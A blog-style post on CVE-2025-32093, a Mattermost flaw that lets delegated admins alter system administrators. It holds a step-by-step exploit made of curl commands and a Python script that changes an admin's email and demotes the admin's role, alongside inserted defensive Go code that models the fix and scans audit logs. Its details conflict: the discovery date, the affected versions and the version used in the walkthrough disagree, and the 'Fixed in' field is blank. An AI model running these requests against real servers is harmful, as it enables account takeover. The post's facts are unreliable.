CVE-2025-32093 - Mattermost Improper Permission Validation Lets Non-Admins Modify System Administrators (With Exploit Details)
In June 2024, the security community identified a critical vulnerability in Mattermost, the popular open-source messaging platform designed for teams and enterprises. Tracked as CVE-2025-32093, this bug affects a wide range of Mattermost versions and can result in unauthorized account escalations and modifications.
Let’s break down CVE-2025-32093 in simple terms: Non-admin users with specific delegated permissions (Edit Other Users) could alter or update the settings of system administrators, leading to privilege abuse.
In this post, we’ll explain the vulnerability, demonstrate a real-world exploitation step-by-step, provide code snippets, and share links to original sources.
Mattermost 9.11. through 9.11.9
Fixed in:
Vulnerability Details
Mattermost allows administrators to delegate granular permissions to select users (for example, to help larger organizations manage users). One of these delegated roles is Edit Other Users. The intention is for this delegated user to manage regular accounts — not to be able to alter system administrators.
However, due to improper permission validation, Mattermost did not restrict certain admin-level operations to other admins only. As a result, if a delegated admin (with Edit Other Users permission) targets a system administrator, they can:
- Change the email, name, or other profile details of admins
- Remove administrators from teams/channels
- Demote system administrators (in some cases)
This vulnerability opens up the possibility of leaking sensitive information, disrupting workflows, or even hijacking admin accounts.
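To make the missing check concrete, here is an added, self-contained model of the authorization decision described above. It is not Mattermost's code: the permission names, the role-to-permission table and the role name "system_user_manager" are simplified stand-ins (assumptions) chosen for the example. The vulnerable function only asks whether the actor holds Edit Other Users; the fixed one adds the rule that an account holding system-admin privileges may only be modified by another system admin.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// Illustrative model of the authorization decision behind CVE-2025-32093.
// Added example, not Mattermost's code: permission and role names below are
// simplified stand-ins (assumed) for the real ones.

const (
	PermEditOtherUsers = "edit_other_users" // the delegated "Edit Other Users" permission
	PermManageSystem   = "manage_system"    // held only by full system administrators
)

// rolePermissions maps a role name to the permissions it grants (assumed values).
var rolePermissions = map[string][]string{
	"system_admin":        {PermEditOtherUsers, PermManageSystem},
	"system_user_manager": {PermEditOtherUsers}, // delegated admin role (assumed name)
	"system_user":         {},
}

// User carries a space-separated role string, the way user records store roles.
type User struct {
	ID    string
	Roles string
}

// Has reports whether any of the user's roles grants perm.
func (u User) Has(perm string) bool {
	for _, role := range strings.Fields(u.Roles) {
		for _, p := range rolePermissions[role] {
			if p == perm {
				return true
			}
		}
	}
	return false
}

// IsSystemAdmin is true for accounts that hold the system-wide admin permission.
func (u User) IsSystemAdmin() bool { return u.Has(PermManageSystem) }

var ErrForbidden = errors.New("forbidden: insufficient permission to modify this user")

// AuthorizeModifyVulnerable mirrors the flawed check: it only asks whether the
// actor holds Edit Other Users and never looks at who the target is, so a
// delegated admin can patch, re-role or remove a system administrator.
func AuthorizeModifyVulnerable(actor, target User) error {
	if actor.Has(PermEditOtherUsers) {
		return nil
	}
	return ErrForbidden
}

// AuthorizeModifyFixed adds the missing rule: an account that holds
// system-admin privileges may only be modified by another system admin.
// The same gate applies to profile patches, role changes and team/channel removals.
func AuthorizeModifyFixed(actor, target User) error {
	if !actor.Has(PermEditOtherUsers) {
		return ErrForbidden
	}
	if target.IsSystemAdmin() && !actor.IsSystemAdmin() {
		return ErrForbidden
	}
	return nil
}

func main() {
	delegated := User{ID: "userA", Roles: "system_user system_user_manager"}
	admin := User{ID: "bmzxc12345xyz", Roles: "system_user system_admin"}
	regular := User{ID: "userC", Roles: "system_user"}

	cases := []struct {
		name          string
		actor, target User
	}{
		{"delegated admin -> regular user", delegated, regular},
		{"delegated admin -> system admin", delegated, admin},
		{"system admin -> system admin", admin, admin},
		{"regular user -> regular user", regular, regular},
	}
	for _, c := range cases {
		fmt.Printf("%-34s vulnerable=%v fixed=%v\n", c.name,
			AuthorizeModifyVulnerable(c.actor, c.target) == nil,
			AuthorizeModifyFixed(c.actor, c.target) == nil)
	}
}
```

The only case where the two functions disagree is "delegated admin -> system admin": the vulnerable check allows it, the fixed check refuses it. Everything a delegated admin is supposed to be able to do (managing regular accounts) is unchanged.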
Original Disclosure
- Mattermost Security Bulletin MM-64779
- GitHub Issue PR
Exploiting CVE-2025-32093
Let's walk through a simple exploitation scenario assuming an environment with Mattermost 10.5.1, where:
Step 1: Obtain an auth token for User A. Normally, login is done with a POST to /api/v4/users/login:
curl -i -c cookie.txt -X POST https://your-mattermost-instance.com/api/v4/users/login \
-d '{"login_id":"userA@example.com","password":"passwordA"}' \
-H 'Content-Type: application/json'
Extract the TOKEN from the response. (In a browser, it's usually stored as a session cookie.)
Step 2: Call the users API to list users:
curl -s -b cookie.txt -H 'Authorization: Bearer TOKEN' \
'https://your-mattermost-instance.com/api/v4/users?per_page=200'
Locate User B (System Admin) by email/username and note their "id" (e.g., "id":"bmzxc12345xyz").
Step 3: Change the admin's email or profile
Using the /api/v4/users/{user_id}/patch endpoint (called with the PUT method, as the snippet below does), send a request targeted at the admin's user ID.
Exploit code snippet
import requests

base_url = 'https://your-mattermost-instance.com'
admin_user_id = 'bmzxc12345xyz'
token = 'YOUR_DELEGATED_ADMIN_TOKEN'  # Use the session token

headers = {
    'Authorization': f'Bearer {token}',
    'Content-Type': 'application/json'
}
payload = {
    "email": "attacker_new_email@example.com",
    "last_name": "Hacked"
}

r = requests.put(f'{base_url}/api/v4/users/{admin_user_id}/patch', headers=headers, json=payload)
print(r.status_code, r.text)
The request should NOT succeed unless you are a system admin. But due to CVE-2025-32093, it works if your delegated admin role has the Edit Other Users permission.
Result: The admin’s profile is altered by a non-admin.
Some versions allow editing of the user's roles as well. You might try:
curl -X PUT -b cookie.txt -H "Content-Type: application/json" \
-d '{"roles": "system_user"}' \
https://your-mattermost-instance.com/api/v4/users/bmzxc12345xyz/roles
If the API permits, you may have *demoted* the system admin.
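For defenders, the useful question is whether any of the calls shown in this walkthrough have already been made against an admin account. The following added example (not from the original post and not Mattermost's code) scans audit records for successful user-profile or role changes where the target holds the system_admin role and the actor does not. The JSON-lines layout of the records, the event names "patchUser" and "updateUserRoles", and the sample user directory are all constructed assumptions for this example; map them onto the field and event names of your own audit log before use.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Added detection example, not part of the original post and not Mattermost's
// code. The record layout (timestamp, event, actor_id, target_id, status) and
// the event names are assumed simplifications; adapt them to your log format.

// AuditRecord is one line of a JSON-lines audit log (assumed layout).
type AuditRecord struct {
	Timestamp string `json:"timestamp"`
	Event     string `json:"event"`
	ActorID   string `json:"actor_id"`
	TargetID  string `json:"target_id"`
	Status    string `json:"status"`
}

// Finding is one successful modification of a system-admin account made by an
// actor who does not hold the system_admin role.
type Finding struct {
	Timestamp, Event, ActorID, TargetID string
}

// userModifyingEvents are the API actions the post shows being abused
// (assumed event names for the two endpoints).
var userModifyingEvents = map[string]bool{
	"patchUser":       true, // PUT /api/v4/users/{id}/patch
	"updateUserRoles": true, // PUT /api/v4/users/{id}/roles
}

// isSystemAdmin checks a space-separated role string for the system_admin role.
func isSystemAdmin(roles string) bool {
	for _, r := range strings.Fields(roles) {
		if r == "system_admin" {
			return true
		}
	}
	return false
}

// FindAdminModsByNonAdmins scans JSON-lines audit data and returns the records
// in which a non-system-admin actor successfully modified a system admin.
// rolesByID maps user id -> role string (for example from a user export).
func FindAdminModsByNonAdmins(logData string, rolesByID map[string]string) ([]Finding, error) {
	var findings []Finding
	for n, line := range strings.Split(logData, "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		var rec AuditRecord
		if err := json.Unmarshal([]byte(line), &rec); err != nil {
			return nil, fmt.Errorf("line %d: %w", n+1, err)
		}
		if !userModifyingEvents[rec.Event] || rec.Status != "success" {
			continue
		}
		if rec.ActorID == rec.TargetID {
			continue // users editing their own profile is normal
		}
		if isSystemAdmin(rolesByID[rec.TargetID]) && !isSystemAdmin(rolesByID[rec.ActorID]) {
			findings = append(findings, Finding{rec.Timestamp, rec.Event, rec.ActorID, rec.TargetID})
		}
	}
	return findings, nil
}

// Constructed sample data so the example runs stand-alone. The admin id reuses
// the one from the post; the other ids and the delegated role name are made up.
var sampleRoles = map[string]string{
	"bmzxc12345xyz": "system_user system_admin",         // User B, the system admin
	"usera00000001": "system_user system_user_manager",  // User A, delegated admin
	"admin00000002": "system_user system_admin",         // a second system admin
}

const sampleLog = `
{"timestamp":"2025-04-14T07:15:14Z","event":"patchUser","actor_id":"usera00000001","target_id":"bmzxc12345xyz","status":"success"}
{"timestamp":"2025-04-14T07:16:02Z","event":"updateUserRoles","actor_id":"usera00000001","target_id":"bmzxc12345xyz","status":"fail"}
{"timestamp":"2025-04-14T07:17:40Z","event":"patchUser","actor_id":"admin00000002","target_id":"bmzxc12345xyz","status":"success"}
{"timestamp":"2025-04-14T07:18:05Z","event":"patchUser","actor_id":"bmzxc12345xyz","target_id":"bmzxc12345xyz","status":"success"}
{"timestamp":"2025-04-14T07:19:11Z","event":"updateUserRoles","actor_id":"usera00000001","target_id":"bmzxc12345xyz","status":"success"}
`

func main() {
	findings, err := FindAdminModsByNonAdmins(sampleLog, sampleRoles)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s %s: %s modified admin account %s\n", f.Timestamp, f.Event, f.ActorID, f.TargetID)
	}
}
```

On the constructed sample this reports two findings: the successful patchUser and the successful updateUserRoles made by the delegated admin against the system admin. The failed role change, the edit by another system admin and the admin's own self-edit are all skipped. Any hit on a real deployment is a strong signal that the delegated permission was exercised against an admin and that the account's email, profile and roles should be reviewed.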
References
- Mattermost Security Advisories - CVE-2025-32093
- GitHub PR with Fix: mattermost-server/pull/25735
- Mattermost API documentation
Conclusion
CVE-2025-32093 is a dangerous oversight in permission checks affecting thousands of Mattermost deployments worldwide. Delegated admins should never be able to modify full system administrators — yet for many versions, they could. If your company uses Mattermost, prioritize patching and review delegated privileges right now.
Stay safe, and keep those patches coming!
*Written exclusively for you. Please respect Mattermost’s security disclosure and upgrade without delay.*
Timeline
Published on: 04/14/2025 07:15:14 UTC
Last modified on: 04/15/2025 18:39:27 UTC